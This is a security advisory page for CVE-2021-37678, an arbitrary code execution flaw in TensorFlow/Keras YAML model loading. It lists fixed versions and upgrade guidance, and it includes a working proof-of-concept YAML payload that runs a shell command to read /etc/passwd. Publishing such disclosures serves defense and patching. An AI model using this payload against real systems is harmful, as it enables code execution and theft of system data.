Advisory Database
  • Advisories
  • Dependency Scanning
  1. pypi
  2. ›
  3. tensorflow-gpu
  4. ›
  5. CVE-2021-37678

CVE-2021-37678: Arbitrary code execution due to YAML deserialization

August 25, 2021 (updated November 13, 2024)

TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format.

from tensorflow.keras import models

payload = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''

models.model_from_yaml(payload)

References

  • github.com/advisories/GHSA-r6jx-9g48-2r5r
  • github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-591.yaml
  • github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-789.yaml
  • github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-300.yaml
  • github.com/tensorflow/tensorflow
  • github.com/tensorflow/tensorflow/commit/1df5a69e9f1a18a937e7907223066e606bf466b9
  • github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
  • github.com/tensorflow/tensorflow/commit/8e47a685785bef8f81bcb996048921dfde08a9ab
  • github.com/tensorflow/tensorflow/commit/a09ab4e77afdcc6e1e045c9d41d5edab63aafc1a
  • github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
  • nvd.nist.gov/vuln/detail/CVE-2021-37678

Code Behaviors & Features

Detect and mitigate CVE-2021-37678 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Dependency Scanning using SBOM also detects vulnerabilities from proprietary advisories that this site does not include. Learn more about Dependency Scanning using SBOM →

Affected versions

All versions before 2.3.4, all versions starting from 2.4.0 before 2.4.3, all versions starting from 2.5.0 before 2.5.1, version 2.5.0

Fixed versions

  • 2.3.4
  • 2.4.3
  • 2.5.1

Solution

Upgrade to versions 2.3.4, 2.4.3, 2.5.1 or above.

Impact 8.8 HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Learn more about CVSS

Weakness

  • CWE-502: Deserialization of Untrusted Data

Source file

pypi/tensorflow-gpu/CVE-2021-37678.yml

Spotted a mistake? Edit the file on GitLab.

  • Site Repo
  • About GitLab
  • Terms
  • Privacy Statement
  • Contact

Page generated Sun, 08 Nov 2026 00:16:27 +0000.